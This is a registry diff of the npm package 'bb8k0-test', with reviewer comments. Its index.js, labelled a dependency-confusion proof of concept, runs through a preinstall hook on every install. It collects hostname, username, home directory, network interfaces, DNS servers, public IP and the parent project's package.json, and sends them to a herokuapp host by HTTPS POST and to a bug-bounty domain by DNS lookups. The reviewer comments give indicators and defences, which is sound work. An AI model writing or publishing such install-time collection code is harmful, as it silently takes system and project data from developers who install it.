bb8k0-test 0.200.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
- package/index.js +143 -0
- package/package.json +13 -0
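--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,143 @@
+// This is a PoC of dependecy confusion attack, published for security research purposes only.
+// The code contained in this package does not exfiltrate any type of credential
+
+const https = require('https');
+const os = require("os");
+const dns = require("dns");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const sendData = (url, path, method, post_data) => {
+const promise = new Promise((resolve, reject) => {
+var options = {
+hostname: url,
+port: 443,
+path,
+method,
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': post_data ? Buffer.byteLength(post_data) : 0
+}
+};
+
+var req = https.request(options, function (res) {
+res.setEncoding('utf8');
+
+var body = '';
+
+res.on('data', function (chunk) {
+body = body + chunk;
+});
+
+res.on('end', function () {
+if (res.statusCode != 200) {
+reject("Api call failed with response code " + res.statusCode);
+} else {
+resolve(body);
+}
+});
+});
+
+req.on('error', function (e) {
+console.log("Error : " + e.message);
+reject(e);
+});
+
+if (post_data) req.write(post_data);
+req.end();
+});
+return promise;
+}
+
+const getIP = () => {
+return sendData('api.ipify.org', '/?format=json', 'GET', '');
+}
+
+const sendUsingHTTP = (data) => {
+const { networkInterfaces } = os;
+const nets = networkInterfaces();
+
+let parentPackageJSON = {};
+
+try {
+const regex = new RegExp("node_modules/\s*([^.]+|\S+)")
+const appDir = __dirname.replace(regex, "")
+
+parentPackageJSON = require(appDir + "package.json");
+}
+catch (e) {
+parentPackageJSON = { message: "No parent package.json found" };
+}
+
+const telemetry = JSON.stringify({
+package: package,
+date: new Date(),
+tzOffset: new Date().getTimezoneOffset(),
+actualDirectory: __dirname,
+homeDirectory: os.homedir(),
+hostname: os.hostname(),
+userName: os.userInfo().username,
+dns: dns.getServers(),
+resolved: packageJSON ? packageJSON.___resolved : undefined,
+version: packageJSON.version,
+packageJSON,
+parentPackageJSON,
+ip: data.ip || "",
+...nets
+});
+
+sendData('yggdrasilr.herokuapp.com', '', 'POST', telemetry);
+}
+
+function sendUsingDNSQuery(data) {
+
+function chunkString(str, length) {
+return str.match(new RegExp('.{1,' + length + '}', 'g')).toString().replaceAll(",", ".");
+}
+
+String.prototype.hexEncode = function () {
+var hex, i;
+var result = "";
+for (i = 0; i < this.length; i++) {
+hex = this.charCodeAt(i).toString(16);
+result += ("000" + hex).slice(-4);
+}
+
+return result
+}
+
+String.prototype.replaceAll = function (find, replace) {
+return this.replace(new RegExp(find, 'g'), replace);
+}
+
+const ip = data.ip || "";
+
+const query = os.hostname() + "," + os.userInfo().username + "," + ip + "," + os.homedir()
+const hexInfos = query.hexEncode();
+const chunked = chunkString(hexInfos, 50)
+
+// Just for debugging, please comment before publish
+// console.log(chunked + ".sub.bugbountyautomation.com")
+
+let messages = chunked.split('.');
+
+messages.map((message, item) => {
+// console.log(message + "." + item);
+dns.resolve(message + "." + item + ".sub.bugbountyautomation.com", (err, address) => {
+if (err) {
+console.log(err.stack)
+}
+});
+});
+}
+
+const sendTelemetry = async () => {
+getIP().then(data => {
+if (data) {
+sendUsingHTTP(JSON.parse(data));
+sendUsingDNSQuery(JSON.parse(data));
+}
+});
+}
+
+sendTelemetry();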
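Review bot: The header comment at the top of the hunk (`// The code contained in this package does not exfiltrate any type of credential`) understates what `sendUsingHTTP` and `sendUsingDNSQuery` transmit: the telemetry object built at lines 72–87 carries hostname, username, home directory, configured DNS servers, every network interface, this package's package.json and the consuming project's package.json, and is POSTed to `yggdrasilr.herokuapp.com`, while the DNS path hex-encodes hostname, username, public IP and home directory into labels under `sub.bugbountyautomation.com`. For anyone assessing an environment where this ran, the observable install-time indicators are therefore an HTTPS GET to `api.ipify.org`, an HTTPS POST to the herokuapp host, and a run of DNS lookups matching `<hex-chunk>.<index>.sub.bugbountyautomation.com`. Separately, `String.prototype.replaceAll = function (find, replace) {...}` overrides the native method for the whole process with regex-from-string semantics, and `sendTelemetry` attaches no rejection handler to `getIP()`, so a rejected `sendData` surfaces as an unhandled promise rejection. I would replace the second header line with an accurate statement such as `// Collects hostname, username, home directory, DNS servers, network interfaces, public IP and the parent package.json, and sends them to yggdrasilr.herokuapp.com (HTTPS) and sub.bugbountyautomation.com (DNS).`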
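--- /dev/null
+++ b/package/package.json
@@ -0,0 +1,13 @@
+{
+"name": "bb8k0-test",
+"version": "0.200.4",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"keywords": [],
+"author": "",
+"license": "ISC"
+}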
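Review bot: The `"preinstall": "node index.js"` hook at line 8 makes index.js execute during `npm install`, before anything in the consuming project has imported the package and with whatever privileges the install runs under; this hook, not the module code, is what lets the collection in index.js reach an environment that merely resolves the name. package.json cannot carry comments, so the index.js header is the place to state plainly that installing the package runs the collection code automatically. On the consuming side the relevant controls are `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc), reserving internal package names under a private registry scope so a same-named public package cannot be substituted, and lockfile integrity checks; the empty `"description"` and `"author"` fields are additional signals a registry policy check could flag.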